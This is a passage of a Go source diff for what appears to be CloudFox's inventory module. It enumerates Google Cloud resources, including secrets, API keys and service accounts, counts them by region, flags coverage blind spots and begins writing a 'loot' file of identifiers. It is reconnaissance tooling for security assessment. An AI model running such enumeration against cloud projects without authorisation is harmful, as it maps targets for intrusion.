go m.enumSSLCertificates(ctx, projectID, &wg, semaphore) + + wg.Wait() +} + +// Resource enumeration functions + +func (m *InventoryModule) enumComputeInstances(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := computeengineservice.New() + instances, err := svc.Instances(projectID) + if err != nil { + return + } + + for _, inst := range instances { + region := extractRegionFromZone(inst.Zone) + m.addResource("Compute Instances", region, fmt.Sprintf("projects/%s/zones/%s/instances/%s", projectID, inst.Zone, inst.Name)) + } +} + +func (m *InventoryModule) enumGKEClusters(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := gkeservice.New() + clusters, _, err := svc.Clusters(projectID) // Returns clusters, nodePools, error + if err != nil { + return + } + + for _, cluster := range clusters { + m.addResource("GKE Clusters", cluster.Location, fmt.Sprintf("projects/%s/locations/%s/clusters/%s", projectID, cluster.Location, cluster.Name)) + } +} + +func (m *InventoryModule) enumCloudRun(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := cloudrunservice.New() + services, err := svc.Services(projectID) + if err == nil { + for _, s := range services { + m.addResource("Cloud Run Services", s.Region, fmt.Sprintf("projects/%s/locations/%s/services/%s", projectID, s.Region, s.Name)) + } + } + + jobs, err := svc.Jobs(projectID) + if err == nil { + for _, job := range jobs { + m.addResource("Cloud Run Jobs", job.Region, fmt.Sprintf("projects/%s/locations/%s/jobs/%s", projectID, job.Region, job.Name)) + } + } +} + +func (m *InventoryModule) enumCloudFunctions(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := functionsservice.New() + functions, err := svc.Functions(projectID) + if err != nil { + return + } + + for _, fn := range functions { + m.addResource("Cloud Functions", fn.Region, fmt.Sprintf("projects/%s/locations/%s/functions/%s", projectID, fn.Region, fn.Name)) + } +} + +func (m *InventoryModule) enumBuckets(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := cloudstorageservice.New() + buckets, err := svc.Buckets(projectID) + if err != nil { + return + } + + for _, bucket := range buckets { + m.addResource("Cloud Storage Buckets", bucket.Location, fmt.Sprintf("gs://%s", bucket.Name)) + } +} + +func (m *InventoryModule) enumBigQuery(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := bigqueryservice.New() + datasets, err := svc.BigqueryDatasets(projectID) + if err != nil { + return + } + + for _, ds := range datasets { + m.addResource("BigQuery Datasets", ds.Location, fmt.Sprintf("projects/%s/datasets/%s", projectID, ds.DatasetID)) + } +} + +func (m *InventoryModule) enumCloudSQL(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := cloudsqlservice.New() + instances, err := svc.Instances(projectID) + if err != nil { + return + } + + for _, inst := range instances { + m.addResource("Cloud SQL Instances", inst.Region, fmt.Sprintf("projects/%s/instances/%s", projectID, inst.Name)) + } +} + +func (m *InventoryModule) enumSpanner(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := spannerservice.New() + result, err := svc.ListInstancesAndDatabases(projectID) + if err != nil { + return + } + + for _, inst := range result.Instances { + // Spanner config contains region info + region := "global" + if inst.Config != "" { + region = inst.Config + } + m.addResource("Spanner Instances", region, fmt.Sprintf("projects/%s/instances/%s", projectID, inst.Name)) + } +} + +func (m *InventoryModule) enumBigtable(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := bigtableservice.New() + result, err := svc.ListInstances(projectID) + if err != nil { + return + } + + for _, inst := range result.Instances { + // Use first cluster location as region + region := "global" + if len(inst.Clusters) > 0 { + region = inst.Clusters[0].Location + } + m.addResource("Bigtable Instances", region, fmt.Sprintf("projects/%s/instances/%s", projectID, inst.Name)) + } +} + +func (m *InventoryModule) enumMemorystore(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := memorystoreservice.New() + instances, err := svc.ListRedisInstances(projectID) + if err != nil { + return + } + + for _, inst := range instances { + m.addResource("Memorystore Redis", inst.Location, fmt.Sprintf("projects/%s/locations/%s/instances/%s", projectID, inst.Location, inst.Name)) + } +} + +func (m *InventoryModule) enumFilestore(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := filestoreservice.New() + instances, err := svc.ListInstances(projectID) + if err != nil { + return + } + + for _, inst := range instances { + m.addResource("Filestore Instances", inst.Location, fmt.Sprintf("projects/%s/locations/%s/instances/%s", projectID, inst.Location, inst.Name)) + } +} + +func (m *InventoryModule) enumServiceAccounts(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := iamservice.New() + accounts, err := svc.ServiceAccounts(projectID) + if err != nil { + return + } + + for _, sa := range accounts { + m.addResource("Service Accounts", "global", sa.Email) + } +} + +func (m *InventoryModule) enumKMS(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := kmsservice.New() + keyRings, err := svc.KeyRings(projectID) + if err != nil { + return + } + + for _, kr := range keyRings { + m.addResource("KMS Key Rings", kr.Location, fmt.Sprintf("projects/%s/locations/%s/keyRings/%s", projectID, kr.Location, kr.Name)) + } +} + +func (m *InventoryModule) enumSecrets(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc, err := secretsservice.NewWithSession(nil) + if err != nil { + return + } + secrets, err := svc.Secrets(projectID) + if err != nil { + return + } + + for _, secret := range secrets { + // Secrets are global but may have regional replicas + region := "global" + if len(secret.ReplicaLocations) > 0 { + region = secret.ReplicaLocations[0] + } + m.addResource("Secrets", region, secret.Name) + } +} + +func (m *InventoryModule) enumAPIKeys(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := apikeysservice.New() + keys, err := svc.ListAPIKeys(projectID) + if err != nil { + return + } + + for _, key := range keys { + m.addResource("API Keys", "global", key.Name) + } +} + +func (m *InventoryModule) enumPubSub(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := pubsubservice.New() + topics, err := svc.Topics(projectID) + if err == nil { + for _, topic := range topics { + m.addResource("Pub/Sub Topics", "global", fmt.Sprintf("projects/%s/topics/%s", projectID, topic.Name)) + } + } + + subscriptions, err := svc.Subscriptions(projectID) + if err == nil { + for _, sub := range subscriptions { + m.addResource("Pub/Sub Subscriptions", "global", fmt.Sprintf("projects/%s/subscriptions/%s", projectID, sub.Name)) + } + } +} + +func (m *InventoryModule) enumDNS(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := dnsservice.New() + zones, err := svc.Zones(projectID) + if err != nil { + return + } + + for _, zone := range zones { + m.addResource("DNS Zones", "global", fmt.Sprintf("projects/%s/managedZones/%s", projectID, zone.Name)) + } +} + +func (m *InventoryModule) enumCloudBuild(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := cloudbuildservice.New() + triggers, err := svc.ListTriggers(projectID) + if err != nil { + return + } + + for _, trigger := range triggers { + region := "global" + m.addResource("Cloud Build Triggers", region, fmt.Sprintf("projects/%s/locations/%s/triggers/%s", projectID, region, trigger.Name)) + } +} + +func (m *InventoryModule) enumSourceRepos(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := sourcereposservice.New() + repos, err := svc.ListRepos(projectID) + if err != nil { + return + } + + for _, repo := range repos { + m.addResource("Source Repositories", "global", fmt.Sprintf("projects/%s/repos/%s", projectID, repo.Name)) + } +} + +func (m *InventoryModule) enumArtifactRegistry(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc, err := artifactregistryservice.NewWithSession(nil) + if err != nil { + return + } + repos, err := svc.Repositories(projectID) + if err != nil { + return + } + + for _, repo := range repos { + m.addResource("Artifact Registries", repo.Location, fmt.Sprintf("projects/%s/locations/%s/repositories/%s", projectID, repo.Location, repo.Name)) + } +} + +func (m *InventoryModule) enumDataflow(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := dataflowservice.New() + jobs, err := svc.ListJobs(projectID) + if err != nil { + return + } + + for _, job := range jobs { + m.addResource("Dataflow Jobs", job.Location, fmt.Sprintf("projects/%s/locations/%s/jobs/%s", projectID, job.Location, job.ID)) + } +} + +func (m *InventoryModule) enumDataproc(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := dataprocservice.New() + clusters, err := svc.ListClusters(projectID) + if err != nil { + return + } + + for _, cluster := range clusters { + m.addResource("Dataproc Clusters", cluster.Region, fmt.Sprintf("projects/%s/regions/%s/clusters/%s", projectID, cluster.Region, cluster.Name)) + } +} + +func (m *InventoryModule) enumNotebooks(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := notebooksservice.New() + instances, err := svc.ListInstances(projectID) + if err != nil { + return + } + + for _, inst := range instances { + m.addResource("Notebook Instances", inst.Location, fmt.Sprintf("projects/%s/locations/%s/instances/%s", projectID, inst.Location, inst.Name)) + } +} + +func (m *InventoryModule) enumComposer(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := composerservice.New() + envs, err := svc.ListEnvironments(projectID) + if err != nil { + return + } + + for _, env := range envs { + m.addResource("Composer Environments", env.Location, fmt.Sprintf("projects/%s/locations/%s/environments/%s", projectID, env.Location, env.Name)) + } +} + +func (m *InventoryModule) enumScheduler(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := schedulerservice.New() + jobs, err := svc.Jobs(projectID) + if err != nil { + return + } + + for _, job := range jobs { + m.addResource("Scheduler Jobs", job.Location, fmt.Sprintf("projects/%s/locations/%s/jobs/%s", projectID, job.Location, job.Name)) + } +} + +func (m *InventoryModule) enumLoggingSinks(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := loggingservice.New() + sinks, err := svc.Sinks(projectID) + if err != nil { + return + } + + for _, sink := range sinks { + m.addResource("Log Sinks", "global", fmt.Sprintf("projects/%s/sinks/%s", projectID, sink.Name)) + } +} + +func (m *InventoryModule) enumCloudArmor(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := cloudarmorservice.New() + policies, err := svc.GetSecurityPolicies(projectID) + if err != nil { + return + } + + for _, policy := range policies { + m.addResource("Cloud Armor Policies", "global", fmt.Sprintf("projects/%s/global/securityPolicies/%s", projectID, policy.Name)) + } +} + +func (m *InventoryModule) enumSSLCertificates(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := certmanagerservice.New() + certs, err := svc.GetCertificates(projectID) + if err != nil { + return + } + + for _, cert := range certs { + m.addResource("SSL Certificates", cert.Location, fmt.Sprintf("projects/%s/locations/%s/certificates/%s", projectID, cert.Location, cert.Name)) + } +} + +// addResource safely adds a resource count +func (m *InventoryModule) addResource(resourceType, region, resourceID string) { + m.mu.Lock() + defer m.mu.Unlock() + + // Normalize region + if region == "" { + region = "global" + } + region = strings.ToLower(region) + + // Track region + m.regions[region] = true + + // Increment count + if m.resourceCounts[resourceType] == nil { + m.resourceCounts[resourceType] = make(map[string]int) + } + m.resourceCounts[resourceType][region]++ + + // Track resource ID + if m.resourceIDs[resourceType] == nil { + m.resourceIDs[resourceType] = make(map[string][]string) + } + m.resourceIDs[resourceType][region] = append(m.resourceIDs[resourceType][region], resourceID) +} + +// calculateTotals computes the total counts +func (m *InventoryModule) calculateTotals() { + for resourceType, regionCounts := range m.resourceCounts { + for region, count := range regionCounts { + m.totalByType[resourceType] += count + m.totalByRegion[region] += count + m.grandTotal += count + } + } +} + +// collectAssetInventory queries Cloud Asset Inventory API for complete resource counts +func (m *InventoryModule) collectAssetInventory(ctx context.Context, logger internal.Logger) { + svc := assetservice.New() + + for _, projectID := range m.ProjectIDs { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Querying asset inventory for project: %s", projectID), GCP_INVENTORY_MODULE_NAME) + } + + counts, err := svc.GetAssetTypeCounts(projectID) + if err != nil { + m.mu.Lock() + m.assetAPIFailedProjs = append(m.assetAPIFailedProjs, projectID) + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + gcpinternal.HandleGCPError(err, logger, GCP_INVENTORY_MODULE_NAME, + fmt.Sprintf("Could not query asset inventory for project %s (API may not be enabled)", projectID)) + } + continue + } + + m.mu.Lock() + m.assetAPIEnabled = true // At least one project succeeded + if m.assetCounts[projectID] == nil { + m.assetCounts[projectID] = make(map[string]int) + } + for _, c := range counts { + m.assetCounts[projectID][c.AssetType] = c.Count + m.assetGrandTotal += c.Count + } + m.mu.Unlock() + } + + // Show warning if Asset API failed for some/all projects + if len(m.assetAPIFailedProjs) > 0 { + if !m.assetAPIEnabled { + logger.InfoM("WARNING: Cloud Asset Inventory API not enabled in any project.", GCP_INVENTORY_MODULE_NAME) + logger.InfoM("To enable complete resource coverage, enable the Cloud Asset API:", GCP_INVENTORY_MODULE_NAME) + logger.InfoM(" gcloud services enable cloudasset.googleapis.com --project=", GCP_INVENTORY_MODULE_NAME) + } else { + logger.InfoM(fmt.Sprintf("WARNING: Cloud Asset Inventory API failed for %d project(s): %s", + len(m.assetAPIFailedProjs), strings.Join(m.assetAPIFailedProjs, ", ")), GCP_INVENTORY_MODULE_NAME) + logger.InfoM("These projects will only show CloudFox enumerated resources (potential blind spots)", GCP_INVENTORY_MODULE_NAME) + } + } +} + +// collectEnabledServices queries Service Usage API to find enabled services +// This is a fallback when Asset Inventory API is not available +func (m *InventoryModule) collectEnabledServices(ctx context.Context, logger internal.Logger) { + svc, err := serviceusage.NewService(ctx) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Could not create Service Usage client: %v", err), GCP_INVENTORY_MODULE_NAME) + } + return + } + + for _, projectID := range m.ProjectIDs { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Querying enabled services for project: %s", projectID), GCP_INVENTORY_MODULE_NAME) + } + + parent := fmt.Sprintf("projects/%s", projectID) + var enabledServices []string + + req := svc.Services.List(parent).Filter("state:ENABLED") + err := req.Pages(ctx, func(page *serviceusage.ListServicesResponse) error { + for _, service := range page.Services { + // Extract service name from full path + // Format: projects/123/services/compute.googleapis.com + parts := strings.Split(service.Name, "/") + serviceName := parts[len(parts)-1] + enabledServices = append(enabledServices, serviceName) + } + return nil + }) + + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + gcpinternal.HandleGCPError(err, logger, GCP_INVENTORY_MODULE_NAME, + fmt.Sprintf("Could not query enabled services for project %s", projectID)) + } + continue + } + + m.mu.Lock() + m.enabledServices[projectID] = enabledServices + m.mu.Unlock() + } +} + +// getInterestingServices filters enabled services to show only those that likely contain resources +func getInterestingServices(services []string) []string { + // Services that typically contain enumerable resources + interestingPrefixes := []string{ + "compute.googleapis.com", + "container.googleapis.com", + "run.googleapis.com", + "cloudfunctions.googleapis.com", + "storage.googleapis.com", + "bigquery.googleapis.com", + "sqladmin.googleapis.com", + "spanner.googleapis.com", + "bigtable.googleapis.com", + "redis.googleapis.com", + "file.googleapis.com", + "secretmanager.googleapis.com", + "cloudkms.googleapis.com", + "pubsub.googleapis.com", + "cloudbuild.googleapis.com", + "sourcerepo.googleapis.com", + "artifactregistry.googleapis.com", + "dataflow.googleapis.com", + "dataproc.googleapis.com", + "notebooks.googleapis.com", + "composer.googleapis.com", + "dns.googleapis.com", + "apikeys.googleapis.com", + "cloudscheduler.googleapis.com", + "logging.googleapis.com", + "aiplatform.googleapis.com", + "ml.googleapis.com", + "healthcare.googleapis.com", + "firestore.googleapis.com", + "appengine.googleapis.com", + } + + var interesting []string + for _, svc := range services { + for _, prefix := range interestingPrefixes { + if svc == prefix { + interesting = append(interesting, svc) + break + } + } + } + return interesting +} + +// isServiceCoveredByCloudFox checks if CloudFox has dedicated enumeration for a service +func isServiceCoveredByCloudFox(serviceName string) bool { + coveredServices := map[string]bool{ + "compute.googleapis.com": true, + "container.googleapis.com": true, + "run.googleapis.com": true, + "cloudfunctions.googleapis.com": true, + "storage.googleapis.com": true, + "bigquery.googleapis.com": true, + "sqladmin.googleapis.com": true, + "spanner.googleapis.com": true, + "bigtableadmin.googleapis.com": true, + "redis.googleapis.com": true, + "file.googleapis.com": true, + "secretmanager.googleapis.com": true, + "cloudkms.googleapis.com": true, + "pubsub.googleapis.com": true, + "cloudbuild.googleapis.com": true, + "sourcerepo.googleapis.com": true, + "artifactregistry.googleapis.com": true, + "dataflow.googleapis.com": true, + "dataproc.googleapis.com": true, + "notebooks.googleapis.com": true, + "composer.googleapis.com": true, + "dns.googleapis.com": true, + "apikeys.googleapis.com": true, + "cloudscheduler.googleapis.com": true, + "logging.googleapis.com": true, + "iam.googleapis.com": true, + } + return coveredServices[serviceName] +} + +// isInterestingService checks if a service typically contains enumerable resources +func isInterestingService(serviceName string) bool { + interestingServices := map[string]bool{ + "compute.googleapis.com": true, + "container.googleapis.com": true, + "run.googleapis.com": true, + "cloudfunctions.googleapis.com": true, + "storage.googleapis.com": true, + "storage-component.googleapis.com": true, + "bigquery.googleapis.com": true, + "sqladmin.googleapis.com": true, + "spanner.googleapis.com": true, + "bigtableadmin.googleapis.com": true, + "redis.googleapis.com": true, + "file.googleapis.com": true, + "secretmanager.googleapis.com": true, + "cloudkms.googleapis.com": true, + "pubsub.googleapis.com": true, + "cloudbuild.googleapis.com": true, + "sourcerepo.googleapis.com": true, + "artifactregistry.googleapis.com": true, + "containerregistry.googleapis.com": true, + "dataflow.googleapis.com": true, + "dataproc.googleapis.com": true, + "notebooks.googleapis.com": true, + "composer.googleapis.com": true, + "dns.googleapis.com": true, + "apikeys.googleapis.com": true, + "cloudscheduler.googleapis.com": true, + "logging.googleapis.com": true, + "iam.googleapis.com": true, + "aiplatform.googleapis.com": true, + "ml.googleapis.com": true, + "healthcare.googleapis.com": true, + "firestore.googleapis.com": true, + "appengine.googleapis.com": true, + "vpcaccess.googleapis.com": true, + "servicenetworking.googleapis.com": true, + "memcache.googleapis.com": true, + "documentai.googleapis.com": true, + "dialogflow.googleapis.com": true, + "translate.googleapis.com": true, + "vision.googleapis.com": true, + "speech.googleapis.com": true, + "texttospeech.googleapis.com": true, + "videointelligence.googleapis.com": true, + "automl.googleapis.com": true, + "datacatalog.googleapis.com": true, + "dataplex.googleapis.com": true, + "datastream.googleapis.com": true, + "eventarc.googleapis.com": true, + "workflows.googleapis.com": true, + "gameservices.googleapis.com": true, + } + return interestingServices[serviceName] +} + +// getServiceDescription returns a human-readable description of a GCP service +func getServiceDescription(serviceName string) string { + descriptions := map[string]string{ + "compute.googleapis.com": "VMs, Disks, Networks, Firewalls", + "container.googleapis.com": "GKE Clusters", + "run.googleapis.com": "Cloud Run Services/Jobs", + "cloudfunctions.googleapis.com": "Cloud Functions", + "storage.googleapis.com": "Cloud Storage Buckets", + "bigquery.googleapis.com": "BigQuery Datasets/Tables", + "sqladmin.googleapis.com": "Cloud SQL Instances", + "spanner.googleapis.com": "Spanner Instances", + "bigtableadmin.googleapis.com": "Bigtable Instances", + "redis.googleapis.com": "Memorystore Redis", + "file.googleapis.com": "Filestore Instances", + "secretmanager.googleapis.com": "Secret Manager Secrets", + "cloudkms.googleapis.com": "KMS Keys", + "pubsub.googleapis.com": "Pub/Sub Topics/Subscriptions", + "cloudbuild.googleapis.com": "Cloud Build Triggers", + "sourcerepo.googleapis.com": "Source Repositories", + "artifactregistry.googleapis.com": "Artifact Registry Repos", + "containerregistry.googleapis.com": "Container Registry (gcr.io)", + "dataflow.googleapis.com": "Dataflow Jobs", + "dataproc.googleapis.com": "Dataproc Clusters", + "notebooks.googleapis.com": "AI Notebooks", + "composer.googleapis.com": "Cloud Composer (Airflow)", + "dns.googleapis.com": "Cloud DNS Zones", + "apikeys.googleapis.com": "API Keys", + "cloudscheduler.googleapis.com": "Cloud Scheduler Jobs", + "logging.googleapis.com": "Cloud Logging", + "iam.googleapis.com": "IAM Service Accounts", + "aiplatform.googleapis.com": "Vertex AI Resources", + "ml.googleapis.com": "AI Platform Models", + "healthcare.googleapis.com": "Healthcare API Datasets", + "firestore.googleapis.com": "Firestore Databases", + "appengine.googleapis.com": "App Engine Services", + "vpcaccess.googleapis.com": "VPC Access Connectors", + "memcache.googleapis.com": "Memorystore Memcached", + "documentai.googleapis.com": "Document AI Processors", + "dialogflow.googleapis.com": "Dialogflow Agents", + "datacatalog.googleapis.com": "Data Catalog Entries", + "dataplex.googleapis.com": "Dataplex Lakes", + "datastream.googleapis.com": "Datastream Streams", + "eventarc.googleapis.com": "Eventarc Triggers", + "workflows.googleapis.com": "Cloud Workflows", + } + if desc, ok := descriptions[serviceName]; ok { + return desc + } + return "May contain resources" +} + +// countAssetTypes returns the number of unique asset types found +func (m *InventoryModule) countAssetTypes() int { + types := make(map[string]bool) + for _, projectCounts := range m.assetCounts { + for assetType := range projectCounts { + types[assetType] = true + } + } + return len(types) +} + +// getAssetTypeTotals aggregates asset counts across all projects +func (m *InventoryModule) getAssetTypeTotals() map[string]int { + totals := make(map[string]int) + for _, projectCounts := range m.assetCounts { + for assetType, count := range projectCounts { + totals[assetType] += count + } + } + return totals +} + +// isCoveredAssetType checks if CloudFox has dedicated enumeration for an asset type +func isCoveredAssetType(assetType string) bool { + coveredTypes := map[string]bool{ + "compute.googleapis.com/Instance": true, + "compute.googleapis.com/Disk": true, + "compute.googleapis.com/Snapshot": true, + "compute.googleapis.com/Image": true, + "container.googleapis.com/Cluster": true, + "run.googleapis.com/Service": true, + "run.googleapis.com/Job": true, + "cloudfunctions.googleapis.com/Function": true, + "storage.googleapis.com/Bucket": true, + "bigquery.googleapis.com/Dataset": true, + "sqladmin.googleapis.com/Instance": true, + "spanner.googleapis.com/Instance": true, + "bigtableadmin.googleapis.com/Instance": true, + "redis.googleapis.com/Instance": true, + "file.googleapis.com/Instance": true, + "iam.googleapis.com/ServiceAccount": true, + "cloudkms.googleapis.com/KeyRing": true, + "secretmanager.googleapis.com/Secret": true, + "apikeys.googleapis.com/Key": true, + "pubsub.googleapis.com/Topic": true, + "pubsub.googleapis.com/Subscription": true, + "dns.googleapis.com/ManagedZone": true, + "cloudbuild.googleapis.com/BuildTrigger": true, + "sourcerepo.googleapis.com/Repo": true, + "artifactregistry.googleapis.com/Repository": true, + "dataflow.googleapis.com/Job": true, + "dataproc.googleapis.com/Cluster": true, + "notebooks.googleapis.com/Instance": true, + "composer.googleapis.com/Environment": true, + "cloudscheduler.googleapis.com/Job": true, + "logging.googleapis.com/LogSink": true, + "compute.googleapis.com/SecurityPolicy": true, + "certificatemanager.googleapis.com/Certificate": true, + } + return coveredTypes[assetType] +} + +// formatAssetType converts GCP asset type to human-readable name +func formatAssetType(assetType string) string { + // Split by / and take the last part + parts := strings.Split(assetType, "/") + if len(parts) >= 2 { + service := strings.TrimSuffix(parts[0], ".googleapis.com") + resource := parts[len(parts)-1] + return fmt.Sprintf("%s/%s", service, resource) + } + return assetType +} + +// Helper function to extract region from zone (e.g., us-central1-a -> us-central1) +func extractRegionFromZone(zone string) string { + parts := strings.Split(zone, "-") + if len(parts) >= 3 { + return strings.Join(parts[:len(parts)-1], "-") + } + return zone +} + +// writeOutput generates the table and loot files +func (m *InventoryModule) writeOutput(ctx context.Context, logger internal.Logger) { + var tableFiles []internal.TableFile + + // ======================================== + // Table 1: Complete Asset Inventory (from Cloud Asset API) + // This shows ALL resources, including ones CloudFox doesn't have dedicated modules for + // ======================================== + if m.assetGrandTotal > 0 { + assetTotals := m.getAssetTypeTotals() + + // Sort asset types by count (descending) + var assetTypes []string + for at := range assetTotals { + assetTypes = append(assetTypes, at) + } + sort.Slice(assetTypes, func(i, j int) bool { + return assetTotals[assetTypes[i]] > assetTotals[assetTypes[j]] + }) + + assetHeader := []string{"Asset Type", "Count", "CloudFox Coverage"} + var assetBody [][]string + + // Add total row + assetBody = append(assetBody, []string{"TOTAL", strconv.Itoa(m.assetGrandTotal), "-"}) + + // Add uncovered assets first (these are areas CloudFox might miss) + var uncoveredTypes []string + var coveredTypes []string + for _, at := range assetTypes { + if isCoveredAssetType(at) { + coveredTypes = append(coveredTypes, at) + } else { + uncoveredTypes = append(uncoveredTypes, at) + } + } + + // Uncovered types first (potential blind spots) + for _, at := range uncoveredTypes { + coverage := "NO - potential blind spot" + assetBody = append(assetBody, []string{ + formatAssetType(at), + strconv.Itoa(assetTotals[at]), + coverage, + }) + } + + // Then covered types + for _, at := range coveredTypes { + coverage := "Yes" + assetBody = append(assetBody, []string{ + formatAssetType(at), + strconv.Itoa(assetTotals[at]), + coverage, + }) + } + + tableFiles = append(tableFiles, internal.TableFile{ + Name: "inventory-complete", + Header: assetHeader, + Body: assetBody, + }) + } else if len(m.enabledServices) > 0 { + // ======================================== + // Table 1b: Enabled Services (fallback when Asset API not available) + // Shows which services are enabled to help identify potential blind spots + // ======================================== + serviceHeader := []string{"Service", "CloudFox Coverage", "Description"} + var serviceBody [][]string + + // Aggregate all services across projects + serviceCounts := make(map[string]int) + for _, services := range m.enabledServices { + for _, svc := range services { + serviceCounts[svc]++ + } + } + + // Filter to interesting services and sort + var interestingServices []string + for svc := range serviceCounts { + // Only include services that likely contain resources + if isInterestingService(svc) { + interestingServices = append(interestingServices, svc) + } + } + sort.Strings(interestingServices) + + // Add uncovered services first (potential blind spots) + var uncoveredServices []string + var coveredServices []string + for _, svc := range interestingServices { + if isServiceCoveredByCloudFox(svc) { + coveredServices = append(coveredServices, svc) + } else { + uncoveredServices = append(uncoveredServices, svc) + } + } + + for _, svc := range uncoveredServices { + coverage := "NO - potential blind spot" + desc := getServiceDescription(svc) + serviceBody = append(serviceBody, []string{svc, coverage, desc}) + } + + for _, svc := range coveredServices { + coverage := "Yes" + desc := getServiceDescription(svc) + serviceBody = append(serviceBody, []string{svc, coverage, desc}) + } + + if len(serviceBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "inventory-enabled-services", + Header: serviceHeader, + Body: serviceBody, + }) + } + } + + // ======================================== + // Table 2: Detailed Enumeration by Region (from dedicated CloudFox modules) + // This shows resources with security metadata, organized by region + // ======================================== + if m.grandTotal > 0 { + sortedRegions := m.getSortedRegions() + + // Build header: Resource Type, then regions + header := []string{"Resource Type"} + header = append(header, sortedRegions...) + header = append(header, "Total") + + // Build body + var body [][]string + + // Add total row first + totalRow := []string{"TOTAL"} + for _, region := range sortedRegions { + totalRow = append(totalRow, strconv.Itoa(m.totalByRegion[region])) + } + totalRow = append(totalRow, strconv.Itoa(m.grandTotal)) + body = append(body, totalRow) + + // Sort resource types alphabetically + var resourceTypes []string + for rt := range m.totalByType { + resourceTypes = append(resourceTypes, rt) + } + sort.Strings(resourceTypes) + + // Add row for each resource type (only if it has resources) + for _, resourceType := range resourceTypes { + if m.totalByType[resourceType] == 0 { + continue + } + + row := []string{resourceType} + for _, region := range sortedRegions { + count := m.resourceCounts[resourceType][region] + if count > 0 { + row = append(row, strconv.Itoa(count)) + } else { + row = append(row, "-") + } + } + row = append(row, strconv.Itoa(m.totalByType[resourceType])) + body = append(body, row) + } + + tableFiles = append(tableFiles, internal.TableFile{ + Name: "inventory-detailed", + Header: header, + Body: body, + }) + } + + // ======================================== + // Loot file: All resource identifiers + // ======================================== + var lootContent strings.Builder + lootContent.WriteString("# GCP Resource Inventory\n") + lootContent.WriteString("# Generated by CloudFox\n") + lootContent.WriteString(fmt.Sprintf("# Total resources (Asset Inventory): %d\n", m.assetGrandTotal)) + lootContent.WriteString(fmt.Sprintf("# Total resources (Detailed): %d\n\n", m.grandTotal)) + + // Sort resource types + var resourceTypes []string + for rt := range m.totalByType { + resourceTypes = append(resourceTypes, rt) + } + sort.Strings(resourceTypes) + + sortedRegions := m.getSortedRegions() + for _, resourceType := range resourceTypes { + if m.totalByType[resourceType] == 0 { + continue + } + 